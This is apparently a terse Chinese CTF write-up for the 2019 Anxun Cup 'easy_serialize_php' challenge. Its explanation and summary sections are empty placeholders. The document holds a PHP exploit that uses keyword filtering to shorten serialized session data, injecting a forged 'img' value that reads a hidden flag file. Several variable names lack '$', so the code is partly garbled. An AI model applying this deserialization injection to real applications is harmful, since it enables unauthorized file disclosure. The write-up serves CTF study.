Problem: [安洵杯 2019]easy_serialize_php
思路
- 解题大致思路
EXP
function = @_GET['f'];
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
filter = '/'.implode('|',filter_arr).'/i';//implode — 用字符串连接数组元素
return preg_replace(filter,'',img);//把img里的filter替换成空
}
if($_SESSION){
unset(_SESSION);//清除指定变量,如果_SESSION存在
}
$_SESSION["user"] = 'flagflagflagflagflagphp';//_SESSION赋值
#$_SESSION["user"] = 'test';
$_SESSION['function'] = '";s:8:"function";s:4:"test";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}';//前面吃掉一个";,这里补一个
$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA==';//下面会改变
echo serialize($_SESSION);
extract($_POST);//extract — 从数组中将变量导入到当前的符号表
if(!$function){
// echo 'source_code';
}
if(!$_GET['img_path']){//img_path的值为空
$_SESSION['img'] = base64_encode('guest_img.png');//实际上img的值肯定会变化
}else{//不为空的化,是下面这种情况
_SESSION['img'] = sha1(base64_encode(_GET['img_path']));
}
serialize_info = filter(serialize(_SESSION));//1->序列化->过滤
echo "\r\n";
echo $serialize_info;
if($function == 'highlight_file'){//function来自post
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
userinfo = unserialize(serialize_info);//反序列化,
echo file_get_contents(base64_decode($userinfo['img']));//反序列化中IMG的值,base64解码
}
总结
- 对该题的考点总结